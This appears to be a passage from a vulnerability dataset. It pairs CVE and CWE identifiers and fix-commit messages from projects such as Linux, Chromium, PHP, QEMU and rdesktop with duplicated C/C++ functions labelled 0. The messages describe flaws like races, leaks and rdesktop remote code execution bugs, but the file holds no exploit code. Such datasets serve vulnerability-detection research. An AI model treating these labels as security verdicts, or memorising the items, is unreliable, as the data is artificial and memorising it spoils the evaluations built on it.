(attachLoaderClientToView):
* WebProcess/InjectedBundle/API/c/WKBundlePage.h:
* WebProcess/qt/QtBuiltinBundlePage.cpp:
(WebKit::QtBuiltinBundlePage::QtBuiltinBundlePage):
Tools:
* MiniBrowser/mac/WK2BrowserWindowController.m:
(-[WK2BrowserWindowController awakeFromNib]):
* WebKitTestRunner/InjectedBundle/InjectedBundlePage.cpp:
(WTR::InjectedBundlePage::InjectedBundlePage):
* WebKitTestRunner/TestController.cpp:
(WTR::TestController::createWebViewWithOptions):
git-svn-id: svn://svn.chromium.org/blink/trunk@142762 bbb929c8-8fbe-4397-9dbb-9b2b20218538
|
WKURLRequestRef InjectedBundlePage::willSendRequestForFrame(WKBundlePageRef page, WKBundleFrameRef frame, uint64_t identifier, WKURLRequestRef request, WKURLResponseRef redirectResponse, const void* clientInfo)
{
return static_cast<InjectedBundlePage*>(const_cast<void*>(clientInfo))->willSendRequestForFrame(page, frame, identifier, request, redirectResponse);
}
|
WKURLRequestRef InjectedBundlePage::willSendRequestForFrame(WKBundlePageRef page, WKBundleFrameRef frame, uint64_t identifier, WKURLRequestRef request, WKURLResponseRef redirectResponse, const void* clientInfo)
{
return static_cast<InjectedBundlePage*>(const_cast<void*>(clientInfo))->willSendRequestForFrame(page, frame, identifier, request, redirectResponse);
}
|
C
|
Chrome
| 0 |
CVE-2014-2038
|
https://www.cvedetails.com/cve/CVE-2014-2038/
|
CWE-20
|
https://github.com/torvalds/linux/commit/263b4509ec4d47e0da3e753f85a39ea12d1eff24
|
263b4509ec4d47e0da3e753f85a39ea12d1eff24
|
nfs: always make sure page is up-to-date before extending a write to cover the entire page
We should always make sure the cached page is up-to-date when we're
determining whether we can extend a write to cover the full page -- even
if we've received a write delegation from the server.
Commit c7559663 added logic to skip this check if we have a write
delegation, which can lead to data corruption such as the following
scenario if client B receives a write delegation from the NFS server:
Client A:
# echo 123456789 > /mnt/file
Client B:
# echo abcdefghi >> /mnt/file
# cat /mnt/file
0�D0�abcdefghi
Just because we hold a write delegation doesn't mean that we've read in
the entire page contents.
Cc: <stable@vger.kernel.org> # v3.11+
Signed-off-by: Scott Mayhew <smayhew@redhat.com>
Signed-off-by: Trond Myklebust <trond.myklebust@primarydata.com>
|
int nfs_wb_page(struct inode *inode, struct page *page)
{
loff_t range_start = page_file_offset(page);
loff_t range_end = range_start + (loff_t)(PAGE_CACHE_SIZE - 1);
struct writeback_control wbc = {
.sync_mode = WB_SYNC_ALL,
.nr_to_write = 0,
.range_start = range_start,
.range_end = range_end,
};
int ret;
trace_nfs_writeback_page_enter(inode);
for (;;) {
wait_on_page_writeback(page);
if (clear_page_dirty_for_io(page)) {
ret = nfs_writepage_locked(page, &wbc);
if (ret < 0)
goto out_error;
continue;
}
ret = 0;
if (!PagePrivate(page))
break;
ret = nfs_commit_inode(inode, FLUSH_SYNC);
if (ret < 0)
goto out_error;
}
out_error:
trace_nfs_writeback_page_exit(inode, ret);
return ret;
}
|
int nfs_wb_page(struct inode *inode, struct page *page)
{
loff_t range_start = page_file_offset(page);
loff_t range_end = range_start + (loff_t)(PAGE_CACHE_SIZE - 1);
struct writeback_control wbc = {
.sync_mode = WB_SYNC_ALL,
.nr_to_write = 0,
.range_start = range_start,
.range_end = range_end,
};
int ret;
trace_nfs_writeback_page_enter(inode);
for (;;) {
wait_on_page_writeback(page);
if (clear_page_dirty_for_io(page)) {
ret = nfs_writepage_locked(page, &wbc);
if (ret < 0)
goto out_error;
continue;
}
ret = 0;
if (!PagePrivate(page))
break;
ret = nfs_commit_inode(inode, FLUSH_SYNC);
if (ret < 0)
goto out_error;
}
out_error:
trace_nfs_writeback_page_exit(inode, ret);
return ret;
}
|
C
|
linux
| 0 |
CVE-2012-5135
|
https://www.cvedetails.com/cve/CVE-2012-5135/
|
CWE-399
|
https://github.com/chromium/chromium/commit/b755ebba29dd405d6f1e4cf70f5bc81ffd33b0f6
|
b755ebba29dd405d6f1e4cf70f5bc81ffd33b0f6
|
Guard against the same PrintWebViewHelper being re-entered.
BUG=159165
Review URL: https://chromiumcodereview.appspot.com/11367076
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@165821 0039d316-1c4b-4281-b951-d872f2087c98
|
bool PrintWebViewHelper::InitPrintSettingsAndPrepareFrame(
WebKit::WebFrame* frame,
const WebKit::WebNode& node,
scoped_ptr<PrepareFrameAndViewForPrint>* prepare) {
DCHECK(frame);
bool fit_to_paper_size = !(PrintingNodeOrPdfFrame(frame, node));
if (!InitPrintSettings(fit_to_paper_size)) {
notify_browser_of_print_failure_ = false;
render_view()->RunModalAlertDialog(
frame,
l10n_util::GetStringUTF16(IDS_PRINT_PREVIEW_INVALID_PRINTER_SETTINGS));
return false;
}
DCHECK(!prepare->get());
prepare->reset(new PrepareFrameAndViewForPrint(print_pages_params_->params,
frame, node));
UpdateFrameAndViewFromCssPageLayout(frame, node, prepare->get(),
print_pages_params_->params,
ignore_css_margins_);
Send(new PrintHostMsg_DidGetDocumentCookie(
routing_id(), print_pages_params_->params.document_cookie));
return true;
}
|
bool PrintWebViewHelper::InitPrintSettingsAndPrepareFrame(
WebKit::WebFrame* frame,
const WebKit::WebNode& node,
scoped_ptr<PrepareFrameAndViewForPrint>* prepare) {
DCHECK(frame);
bool fit_to_paper_size = !(PrintingNodeOrPdfFrame(frame, node));
if (!InitPrintSettings(fit_to_paper_size)) {
notify_browser_of_print_failure_ = false;
render_view()->RunModalAlertDialog(
frame,
l10n_util::GetStringUTF16(IDS_PRINT_PREVIEW_INVALID_PRINTER_SETTINGS));
return false;
}
DCHECK(!prepare->get());
prepare->reset(new PrepareFrameAndViewForPrint(print_pages_params_->params,
frame, node));
UpdateFrameAndViewFromCssPageLayout(frame, node, prepare->get(),
print_pages_params_->params,
ignore_css_margins_);
Send(new PrintHostMsg_DidGetDocumentCookie(
routing_id(), print_pages_params_->params.document_cookie));
return true;
}
|
C
|
Chrome
| 0 |
CVE-2018-12232
|
https://www.cvedetails.com/cve/CVE-2018-12232/
|
CWE-362
|
https://github.com/torvalds/linux/commit/6d8c50dcb029872b298eea68cc6209c866fd3e14
|
6d8c50dcb029872b298eea68cc6209c866fd3e14
|
socket: close race condition between sock_close() and sockfs_setattr()
fchownat() doesn't even hold refcnt of fd until it figures out
fd is really needed (otherwise is ignored) and releases it after
it resolves the path. This means sock_close() could race with
sockfs_setattr(), which leads to a NULL pointer dereference
since typically we set sock->sk to NULL in ->release().
As pointed out by Al, this is unique to sockfs. So we can fix this
in socket layer by acquiring inode_lock in sock_close() and
checking against NULL in sockfs_setattr().
sock_release() is called in many places, only the sock_close()
path matters here. And fortunately, this should not affect normal
sock_close() as it is only called when the last fd refcnt is gone.
It only affects sock_close() with a parallel sockfs_setattr() in
progress, which is not common.
Fixes: 86741ec25462 ("net: core: Add a UID field to struct sock.")
Reported-by: shankarapailoor <shankarapailoor@gmail.com>
Cc: Tetsuo Handa <penguin-kernel@i-love.sakura.ne.jp>
Cc: Lorenzo Colitti <lorenzo@google.com>
Cc: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
|
struct socket *sock_alloc(void)
{
struct inode *inode;
struct socket *sock;
inode = new_inode_pseudo(sock_mnt->mnt_sb);
if (!inode)
return NULL;
sock = SOCKET_I(inode);
inode->i_ino = get_next_ino();
inode->i_mode = S_IFSOCK | S_IRWXUGO;
inode->i_uid = current_fsuid();
inode->i_gid = current_fsgid();
inode->i_op = &sockfs_inode_ops;
return sock;
}
|
struct socket *sock_alloc(void)
{
struct inode *inode;
struct socket *sock;
inode = new_inode_pseudo(sock_mnt->mnt_sb);
if (!inode)
return NULL;
sock = SOCKET_I(inode);
inode->i_ino = get_next_ino();
inode->i_mode = S_IFSOCK | S_IRWXUGO;
inode->i_uid = current_fsuid();
inode->i_gid = current_fsgid();
inode->i_op = &sockfs_inode_ops;
return sock;
}
|
C
|
linux
| 0 |
CVE-2011-4930
|
https://www.cvedetails.com/cve/CVE-2011-4930/
|
CWE-134
|
https://htcondor-git.cs.wisc.edu/?p=condor.git;a=commitdiff;h=5e5571d1a431eb3c61977b6dd6ec90186ef79867
|
5e5571d1a431eb3c61977b6dd6ec90186ef79867
| null |
GahpClient::gt4_gram_client_job_status(const char * job_contact,
char ** job_status, char ** job_fault, int * exit_code)
{
static const char* command = "GT4_GRAM_JOB_STATUS";
if (server->m_commands_supported->contains_anycase(command)==FALSE) {
return GAHPCLIENT_COMMAND_NOT_SUPPORTED;
}
if (!job_contact) job_contact=NULLSTRING;
std::string reqline;
int x = sprintf(reqline,"%s",escapeGahpString(job_contact));
ASSERT( x > 0 );
const char *buf = reqline.c_str();
if ( !is_pending(command,buf) ) {
if ( m_mode == results_only ) {
return GAHPCLIENT_COMMAND_NOT_SUBMITTED;
}
now_pending(command,buf,normal_proxy);
}
Gahp_Args* result = get_pending_result(command,buf);
if ( result ) {
if (result->argc != 6) {
EXCEPT("Bad %s Result",command);
}
int rc = atoi(result->argv[1]);
if ( strcasecmp( result->argv[2], NULLSTRING ) ) {
*job_status = strdup( result->argv[2] );
} else {
*job_status = NULL;
}
if ( strcasecmp( result->argv[3], NULLSTRING ) ) {
*job_fault = strdup( result->argv[3] );
} else {
*job_fault = NULL;
}
if ( strcasecmp(result->argv[4], NULLSTRING) ) {
*exit_code = atoi( result->argv[4] );
} else {
*exit_code = GT4_NO_EXIT_CODE;
}
if ( strcasecmp(result->argv[5], NULLSTRING) ) {
error_string = result->argv[5];
} else {
error_string = "";
}
delete result;
return rc;
}
if ( check_pending_timeout(command,buf) ) {
sprintf( error_string, "%s timed out", command );
return GAHPCLIENT_COMMAND_TIMED_OUT;
}
return GAHPCLIENT_COMMAND_PENDING;
}
|
GahpClient::gt4_gram_client_job_status(const char * job_contact,
char ** job_status, char ** job_fault, int * exit_code)
{
static const char* command = "GT4_GRAM_JOB_STATUS";
if (server->m_commands_supported->contains_anycase(command)==FALSE) {
return GAHPCLIENT_COMMAND_NOT_SUPPORTED;
}
if (!job_contact) job_contact=NULLSTRING;
std::string reqline;
int x = sprintf(reqline,"%s",escapeGahpString(job_contact));
ASSERT( x > 0 );
const char *buf = reqline.c_str();
if ( !is_pending(command,buf) ) {
if ( m_mode == results_only ) {
return GAHPCLIENT_COMMAND_NOT_SUBMITTED;
}
now_pending(command,buf,normal_proxy);
}
Gahp_Args* result = get_pending_result(command,buf);
if ( result ) {
if (result->argc != 6) {
EXCEPT("Bad %s Result",command);
}
int rc = atoi(result->argv[1]);
if ( strcasecmp( result->argv[2], NULLSTRING ) ) {
*job_status = strdup( result->argv[2] );
} else {
*job_status = NULL;
}
if ( strcasecmp( result->argv[3], NULLSTRING ) ) {
*job_fault = strdup( result->argv[3] );
} else {
*job_fault = NULL;
}
if ( strcasecmp(result->argv[4], NULLSTRING) ) {
*exit_code = atoi( result->argv[4] );
} else {
*exit_code = GT4_NO_EXIT_CODE;
}
if ( strcasecmp(result->argv[5], NULLSTRING) ) {
error_string = result->argv[5];
} else {
error_string = "";
}
delete result;
return rc;
}
if ( check_pending_timeout(command,buf) ) {
sprintf( error_string, "%s timed out", command );
return GAHPCLIENT_COMMAND_TIMED_OUT;
}
return GAHPCLIENT_COMMAND_PENDING;
}
|
CPP
|
htcondor
| 0 |
CVE-2012-2390
|
https://www.cvedetails.com/cve/CVE-2012-2390/
|
CWE-399
|
https://github.com/torvalds/linux/commit/c50ac050811d6485616a193eb0f37bfbd191cc89
|
c50ac050811d6485616a193eb0f37bfbd191cc89
|
hugetlb: fix resv_map leak in error path
When called for anonymous (non-shared) mappings, hugetlb_reserve_pages()
does a resv_map_alloc(). It depends on code in hugetlbfs's
vm_ops->close() to release that allocation.
However, in the mmap() failure path, we do a plain unmap_region() without
the remove_vma() which actually calls vm_ops->close().
This is a decent fix. This leak could get reintroduced if new code (say,
after hugetlb_reserve_pages() in hugetlbfs_file_mmap()) decides to return
an error. But, I think it would have to unroll the reservation anyway.
Christoph's test case:
http://marc.info/?l=linux-mm&m=133728900729735
This patch applies to 3.4 and later. A version for earlier kernels is at
https://lkml.org/lkml/2012/5/22/418.
Signed-off-by: Dave Hansen <dave@linux.vnet.ibm.com>
Acked-by: Mel Gorman <mel@csn.ul.ie>
Acked-by: KOSAKI Motohiro <kosaki.motohiro@jp.fujitsu.com>
Reported-by: Christoph Lameter <cl@linux.com>
Tested-by: Christoph Lameter <cl@linux.com>
Cc: Andrea Arcangeli <aarcange@redhat.com>
Cc: <stable@vger.kernel.org> [2.6.32+]
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
|
static int vma_has_reserves(struct vm_area_struct *vma)
{
if (vma->vm_flags & VM_MAYSHARE)
return 1;
if (is_vma_resv_set(vma, HPAGE_RESV_OWNER))
return 1;
return 0;
}
|
static int vma_has_reserves(struct vm_area_struct *vma)
{
if (vma->vm_flags & VM_MAYSHARE)
return 1;
if (is_vma_resv_set(vma, HPAGE_RESV_OWNER))
return 1;
return 0;
}
|
C
|
linux
| 0 |
CVE-2016-9137
|
https://www.cvedetails.com/cve/CVE-2016-9137/
|
CWE-416
|
https://git.php.net/?p=php-src.git;a=commit;h=0e6fe3a4c96be2d3e88389a5776f878021b4c59f
|
0e6fe3a4c96be2d3e88389a5776f878021b4c59f
| null |
ZEND_API void zend_unregister_functions(const zend_function_entry *functions, int count, HashTable *function_table TSRMLS_DC) /* {{{ */
{
const zend_function_entry *ptr = functions;
int i=0;
HashTable *target_function_table = function_table;
if (!target_function_table) {
target_function_table = CG(function_table);
}
while (ptr->fname) {
if (count!=-1 && i>=count) {
break;
}
#if 0
zend_printf("Unregistering %s()\n", ptr->fname);
#endif
zend_hash_del(target_function_table, ptr->fname, strlen(ptr->fname)+1);
ptr++;
i++;
}
}
/* }}} */
|
ZEND_API void zend_unregister_functions(const zend_function_entry *functions, int count, HashTable *function_table TSRMLS_DC) /* {{{ */
{
const zend_function_entry *ptr = functions;
int i=0;
HashTable *target_function_table = function_table;
if (!target_function_table) {
target_function_table = CG(function_table);
}
while (ptr->fname) {
if (count!=-1 && i>=count) {
break;
}
#if 0
zend_printf("Unregistering %s()\n", ptr->fname);
#endif
zend_hash_del(target_function_table, ptr->fname, strlen(ptr->fname)+1);
ptr++;
i++;
}
}
/* }}} */
|
C
|
php
| 0 |
CVE-2017-9059
|
https://www.cvedetails.com/cve/CVE-2017-9059/
|
CWE-404
|
https://github.com/torvalds/linux/commit/c70422f760c120480fee4de6c38804c72aa26bc1
|
c70422f760c120480fee4de6c38804c72aa26bc1
|
Merge tag 'nfsd-4.12' of git://linux-nfs.org/~bfields/linux
Pull nfsd updates from Bruce Fields:
"Another RDMA update from Chuck Lever, and a bunch of miscellaneous
bugfixes"
* tag 'nfsd-4.12' of git://linux-nfs.org/~bfields/linux: (26 commits)
nfsd: Fix up the "supattr_exclcreat" attributes
nfsd: encoders mustn't use unitialized values in error cases
nfsd: fix undefined behavior in nfsd4_layout_verify
lockd: fix lockd shutdown race
NFSv4: Fix callback server shutdown
SUNRPC: Refactor svc_set_num_threads()
NFSv4.x/callback: Create the callback service through svc_create_pooled
lockd: remove redundant check on block
svcrdma: Clean out old XDR encoders
svcrdma: Remove the req_map cache
svcrdma: Remove unused RDMA Write completion handler
svcrdma: Reduce size of sge array in struct svc_rdma_op_ctxt
svcrdma: Clean up RPC-over-RDMA backchannel reply processing
svcrdma: Report Write/Reply chunk overruns
svcrdma: Clean up RDMA_ERROR path
svcrdma: Use rdma_rw API in RPC reply path
svcrdma: Introduce local rdma_rw API helpers
svcrdma: Clean up svc_rdma_get_inv_rkey()
svcrdma: Add helper to save pages under I/O
svcrdma: Eliminate RPCRDMA_SQ_DEPTH_MULT
...
|
__be32 nfsd_splice_read(struct svc_rqst *rqstp,
struct file *file, loff_t offset, unsigned long *count)
{
struct splice_desc sd = {
.len = 0,
.total_len = *count,
.pos = offset,
.u.data = rqstp,
};
int host_err;
rqstp->rq_next_page = rqstp->rq_respages + 1;
host_err = splice_direct_to_actor(file, &sd, nfsd_direct_splice_actor);
return nfsd_finish_read(file, count, host_err);
}
|
__be32 nfsd_splice_read(struct svc_rqst *rqstp,
struct file *file, loff_t offset, unsigned long *count)
{
struct splice_desc sd = {
.len = 0,
.total_len = *count,
.pos = offset,
.u.data = rqstp,
};
int host_err;
rqstp->rq_next_page = rqstp->rq_respages + 1;
host_err = splice_direct_to_actor(file, &sd, nfsd_direct_splice_actor);
return nfsd_finish_read(file, count, host_err);
}
|
C
|
linux
| 0 |
null | null | null |
https://github.com/chromium/chromium/commit/d4cd2b2c0953ad7e9fa988c234eb9361be80fe81
|
d4cd2b2c0953ad7e9fa988c234eb9361be80fe81
|
DevTools: 'Overrides' UI overlay obstructs page and element inspector
BUG=302862
R=vsevik@chromium.org
Review URL: https://codereview.chromium.org/40233006
git-svn-id: svn://svn.chromium.org/blink/trunk@160559 bbb929c8-8fbe-4397-9dbb-9b2b20218538
|
void InspectorOverlay::onTimer(Timer<InspectorOverlay>*)
{
m_drawViewSize = false;
update();
}
|
void InspectorOverlay::onTimer(Timer<InspectorOverlay>*)
{
m_drawViewSize = false;
update();
}
|
C
|
Chrome
| 0 |
CVE-2016-6198
|
https://www.cvedetails.com/cve/CVE-2016-6198/
|
CWE-284
|
https://github.com/torvalds/linux/commit/54d5ca871e72f2bb172ec9323497f01cd5091ec7
|
54d5ca871e72f2bb172ec9323497f01cd5091ec7
|
vfs: add vfs_select_inode() helper
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Cc: <stable@vger.kernel.org> # v4.2+
|
SYSCALL_DEFINE2(fchmod, unsigned int, fd, umode_t, mode)
{
struct fd f = fdget(fd);
int err = -EBADF;
if (f.file) {
audit_file(f.file);
err = chmod_common(&f.file->f_path, mode);
fdput(f);
}
return err;
}
|
SYSCALL_DEFINE2(fchmod, unsigned int, fd, umode_t, mode)
{
struct fd f = fdget(fd);
int err = -EBADF;
if (f.file) {
audit_file(f.file);
err = chmod_common(&f.file->f_path, mode);
fdput(f);
}
return err;
}
|
C
|
linux
| 0 |
null | null | null |
https://github.com/chromium/chromium/commit/0008e75b613a252c8a5e2cca58c8376bf0e0a6a8
|
0008e75b613a252c8a5e2cca58c8376bf0e0a6a8
|
Disables PanelBrowserTest.MinimizeTwoPanelsWithoutTabbedWindow on
windows as it's causing other interactive ui tests to fail.
BUG=103253
TBR=dimich@chromium.org
R=dimich@chromium.org
Review URL: http://codereview.chromium.org/8467025
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@108901 0039d316-1c4b-4281-b951-d872f2087c98
|
void WaitForDownload() {
if (!saw_download_) {
waiting_ = true;
ui_test_utils::RunMessageLoop();
EXPECT_TRUE(saw_download_);
waiting_ = false;
}
}
|
void WaitForDownload() {
if (!saw_download_) {
waiting_ = true;
ui_test_utils::RunMessageLoop();
EXPECT_TRUE(saw_download_);
waiting_ = false;
}
}
|
C
|
Chrome
| 0 |
CVE-2013-0922
|
https://www.cvedetails.com/cve/CVE-2013-0922/
|
CWE-264
|
https://github.com/chromium/chromium/commit/28aaa72a03df96fa1934876b0efbbc7e6b4b38af
|
28aaa72a03df96fa1934876b0efbbc7e6b4b38af
|
Revert cross-origin auth prompt blocking.
BUG=174129
Review URL: https://chromiumcodereview.appspot.com/12183030
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@181113 0039d316-1c4b-4281-b951-d872f2087c98
|
net::RequestPriority DetermineRequestPriority(
const ResourceHostMsg_Request& request_data) {
switch (request_data.priority) {
case WebKit::WebURLRequest::PriorityVeryHigh:
return net::HIGHEST;
case WebKit::WebURLRequest::PriorityHigh:
return net::MEDIUM;
case WebKit::WebURLRequest::PriorityMedium:
return net::LOW;
case WebKit::WebURLRequest::PriorityLow:
return net::LOWEST;
case WebKit::WebURLRequest::PriorityVeryLow:
return net::IDLE;
case WebKit::WebURLRequest::PriorityUnresolved:
default:
NOTREACHED();
return net::LOW;
}
}
|
net::RequestPriority DetermineRequestPriority(
const ResourceHostMsg_Request& request_data) {
switch (request_data.priority) {
case WebKit::WebURLRequest::PriorityVeryHigh:
return net::HIGHEST;
case WebKit::WebURLRequest::PriorityHigh:
return net::MEDIUM;
case WebKit::WebURLRequest::PriorityMedium:
return net::LOW;
case WebKit::WebURLRequest::PriorityLow:
return net::LOWEST;
case WebKit::WebURLRequest::PriorityVeryLow:
return net::IDLE;
case WebKit::WebURLRequest::PriorityUnresolved:
default:
NOTREACHED();
return net::LOW;
}
}
|
C
|
Chrome
| 0 |
CVE-2016-5126
|
https://www.cvedetails.com/cve/CVE-2016-5126/
|
CWE-119
|
https://git.qemu.org/?p=qemu.git;a=commit;h=a6b3167fa0e825aebb5a7cd8b437b6d41584a196
|
a6b3167fa0e825aebb5a7cd8b437b6d41584a196
| null |
static int iscsi_get_info(BlockDriverState *bs, BlockDriverInfo *bdi)
{
IscsiLun *iscsilun = bs->opaque;
bdi->unallocated_blocks_are_zero = iscsilun->lbprz;
bdi->can_write_zeroes_with_unmap = iscsilun->lbprz && iscsilun->lbp.lbpws;
bdi->cluster_size = iscsilun->cluster_sectors * BDRV_SECTOR_SIZE;
return 0;
}
|
static int iscsi_get_info(BlockDriverState *bs, BlockDriverInfo *bdi)
{
IscsiLun *iscsilun = bs->opaque;
bdi->unallocated_blocks_are_zero = iscsilun->lbprz;
bdi->can_write_zeroes_with_unmap = iscsilun->lbprz && iscsilun->lbp.lbpws;
bdi->cluster_size = iscsilun->cluster_sectors * BDRV_SECTOR_SIZE;
return 0;
}
|
C
|
qemu
| 0 |
CVE-2016-2508
|
https://www.cvedetails.com/cve/CVE-2016-2508/
|
CWE-119
|
https://android.googlesource.com/platform/frameworks/av/+/f81038006b4c59a5a148dcad887371206033c28f
|
f81038006b4c59a5a148dcad887371206033c28f
|
MPEG4Extractor: ensure kKeyTrackID exists before creating an MPEG4Source as track.
GenericSource: return error when no track exists.
SampleIterator: make sure mSamplesPerChunk is not zero before using it as divisor.
Bug: 21657957
Bug: 23705695
Bug: 22802344
Bug: 28799341
Change-Id: I7664992ade90b935d3f255dcd43ecc2898f30b04
(cherry picked from commit 0386c91b8a910a134e5898ffa924c1b6c7560b13)
|
status_t NuPlayer::GenericSource::seekTo(int64_t seekTimeUs) {
sp<AMessage> msg = new AMessage(kWhatSeek, this);
msg->setInt64("seekTimeUs", seekTimeUs);
sp<AMessage> response;
status_t err = msg->postAndAwaitResponse(&response);
if (err == OK && response != NULL) {
CHECK(response->findInt32("err", &err));
}
return err;
}
|
status_t NuPlayer::GenericSource::seekTo(int64_t seekTimeUs) {
sp<AMessage> msg = new AMessage(kWhatSeek, this);
msg->setInt64("seekTimeUs", seekTimeUs);
sp<AMessage> response;
status_t err = msg->postAndAwaitResponse(&response);
if (err == OK && response != NULL) {
CHECK(response->findInt32("err", &err));
}
return err;
}
|
C
|
Android
| 0 |
CVE-2018-18349
|
https://www.cvedetails.com/cve/CVE-2018-18349/
|
CWE-732
|
https://github.com/chromium/chromium/commit/5f8671e7667b8b133bd3664100012a3906e92d65
|
5f8671e7667b8b133bd3664100012a3906e92d65
|
Add a check for disallowing remote frame navigations to local resources.
Previously, RemoteFrame navigations did not perform any renderer-side
checks and relied solely on the browser-side logic to block disallowed
navigations via mechanisms like FilterURL. This means that blocked
remote frame navigations were silently navigated to about:blank
without any console error message.
This CL adds a CanDisplay check to the remote navigation path to match
an equivalent check done for local frame navigations. This way, the
renderer can consistently block disallowed navigations in both cases
and output an error message.
Bug: 894399
Change-Id: I172f68f77c1676f6ca0172d2a6c78f7edc0e3b7a
Reviewed-on: https://chromium-review.googlesource.com/c/1282390
Reviewed-by: Charlie Reis <creis@chromium.org>
Reviewed-by: Nate Chapin <japhet@chromium.org>
Commit-Queue: Alex Moshchuk <alexmos@chromium.org>
Cr-Commit-Position: refs/heads/master@{#601022}
|
void CommitText(const char* text) {
JNIEnv* env = base::android::AttachCurrentThread();
base::android::ScopedJavaLocalRef<jobject> caller =
ime_adapter()->java_ime_adapter_for_testing(env);
base::android::ScopedJavaLocalRef<jstring> jtext =
base::android::ConvertUTF8ToJavaString(env, text);
ime_adapter()->CommitText(
env, base::android::JavaParamRef<jobject>(env, caller.obj()),
base::android::JavaParamRef<jobject>(env, jtext.obj()),
base::android::JavaParamRef<jstring>(env, jtext.obj()), 0);
}
|
void CommitText(const char* text) {
JNIEnv* env = base::android::AttachCurrentThread();
base::android::ScopedJavaLocalRef<jobject> caller =
ime_adapter()->java_ime_adapter_for_testing(env);
base::android::ScopedJavaLocalRef<jstring> jtext =
base::android::ConvertUTF8ToJavaString(env, text);
ime_adapter()->CommitText(
env, base::android::JavaParamRef<jobject>(env, caller.obj()),
base::android::JavaParamRef<jobject>(env, jtext.obj()),
base::android::JavaParamRef<jstring>(env, jtext.obj()), 0);
}
|
C
|
Chrome
| 0 |
CVE-2016-6289
|
https://www.cvedetails.com/cve/CVE-2016-6289/
|
CWE-190
|
https://git.php.net/?p=php-src.git;a=commit;h=0218acb7e756a469099c4ccfb22bce6c2bd1ef87
|
0218acb7e756a469099c4ccfb22bce6c2bd1ef87
| null |
static inline time_t FileTimeToUnixTime(const FILETIME FileTime)
{
__int64 UnixTime;
long *nsec = NULL;
SYSTEMTIME SystemTime;
FileTimeToSystemTime(&FileTime, &SystemTime);
UnixTime = ((__int64)FileTime.dwHighDateTime << 32) +
FileTime.dwLowDateTime;
UnixTime -= (SECS_BETWEEN_EPOCHS * SECS_TO_100NS);
if (nsec) {
*nsec = (UnixTime % SECS_TO_100NS) * (__int64)100;
}
UnixTime /= SECS_TO_100NS; /* now convert to seconds */
if ((time_t)UnixTime != UnixTime) {
UnixTime = 0;
}
return (time_t)UnixTime;
}
|
static inline time_t FileTimeToUnixTime(const FILETIME FileTime)
{
__int64 UnixTime;
long *nsec = NULL;
SYSTEMTIME SystemTime;
FileTimeToSystemTime(&FileTime, &SystemTime);
UnixTime = ((__int64)FileTime.dwHighDateTime << 32) +
FileTime.dwLowDateTime;
UnixTime -= (SECS_BETWEEN_EPOCHS * SECS_TO_100NS);
if (nsec) {
*nsec = (UnixTime % SECS_TO_100NS) * (__int64)100;
}
UnixTime /= SECS_TO_100NS; /* now convert to seconds */
if ((time_t)UnixTime != UnixTime) {
UnixTime = 0;
}
return (time_t)UnixTime;
}
|
C
|
php
| 0 |
CVE-2017-1000211
|
https://www.cvedetails.com/cve/CVE-2017-1000211/
|
CWE-416
|
https://github.com/ThomasDickey/lynx-snapshots/commit/280a61b300a1614f6037efc0902ff7ecf17146e9
|
280a61b300a1614f6037efc0902ff7ecf17146e9
|
snapshot of project "lynx", label v2-8-9dev_15b
|
void actually_set_style(HTStructured * me)
{
if (!me->text) { /* First time through */
LYGetChartransInfo(me);
UCSetTransParams(&me->T,
me->UCLYhndl, me->UCI,
HTAnchor_getUCLYhndl(me->node_anchor,
UCT_STAGE_HTEXT),
HTAnchor_getUCInfoStage(me->node_anchor,
UCT_STAGE_HTEXT));
me->text = HText_new2(me->node_anchor, me->target);
HText_beginAppend(me->text);
HText_setStyle(me->text, me->new_style);
me->in_word = NO;
LYCheckForContentBase(me);
} else {
HText_setStyle(me->text, me->new_style);
}
me->old_style = me->new_style;
me->style_change = NO;
}
|
void actually_set_style(HTStructured * me)
{
if (!me->text) { /* First time through */
LYGetChartransInfo(me);
UCSetTransParams(&me->T,
me->UCLYhndl, me->UCI,
HTAnchor_getUCLYhndl(me->node_anchor,
UCT_STAGE_HTEXT),
HTAnchor_getUCInfoStage(me->node_anchor,
UCT_STAGE_HTEXT));
me->text = HText_new2(me->node_anchor, me->target);
HText_beginAppend(me->text);
HText_setStyle(me->text, me->new_style);
me->in_word = NO;
LYCheckForContentBase(me);
} else {
HText_setStyle(me->text, me->new_style);
}
me->old_style = me->new_style;
me->style_change = NO;
}
|
C
|
lynx-snapshots
| 0 |
CVE-2018-20182
|
https://www.cvedetails.com/cve/CVE-2018-20182/
|
CWE-119
|
https://github.com/rdesktop/rdesktop/commit/4dca546d04321a610c1835010b5dad85163b65e1
|
4dca546d04321a610c1835010b5dad85163b65e1
|
Malicious RDP server security fixes
This commit includes fixes for a set of 21 vulnerabilities in
rdesktop when a malicious RDP server is used.
All vulnerabilities was identified and reported by Eyal Itkin.
* Add rdp_protocol_error function that is used in several fixes
* Refactor of process_bitmap_updates
* Fix possible integer overflow in s_check_rem() on 32bit arch
* Fix memory corruption in process_bitmap_data - CVE-2018-8794
* Fix remote code execution in process_bitmap_data - CVE-2018-8795
* Fix remote code execution in process_plane - CVE-2018-8797
* Fix Denial of Service in mcs_recv_connect_response - CVE-2018-20175
* Fix Denial of Service in mcs_parse_domain_params - CVE-2018-20175
* Fix Denial of Service in sec_parse_crypt_info - CVE-2018-20176
* Fix Denial of Service in sec_recv - CVE-2018-20176
* Fix minor information leak in rdpdr_process - CVE-2018-8791
* Fix Denial of Service in cssp_read_tsrequest - CVE-2018-8792
* Fix remote code execution in cssp_read_tsrequest - CVE-2018-8793
* Fix Denial of Service in process_bitmap_data - CVE-2018-8796
* Fix minor information leak in rdpsnd_process_ping - CVE-2018-8798
* Fix Denial of Service in process_secondary_order - CVE-2018-8799
* Fix remote code execution in in ui_clip_handle_data - CVE-2018-8800
* Fix major information leak in ui_clip_handle_data - CVE-2018-20174
* Fix memory corruption in rdp_in_unistr - CVE-2018-20177
* Fix Denial of Service in process_demand_active - CVE-2018-20178
* Fix remote code execution in lspci_process - CVE-2018-20179
* Fix remote code execution in rdpsnddbg_process - CVE-2018-20180
* Fix remote code execution in seamless_process - CVE-2018-20181
* Fix remote code execution in seamless_process_line - CVE-2018-20182
|
rdp_send_control(uint16 action)
{
STREAM s;
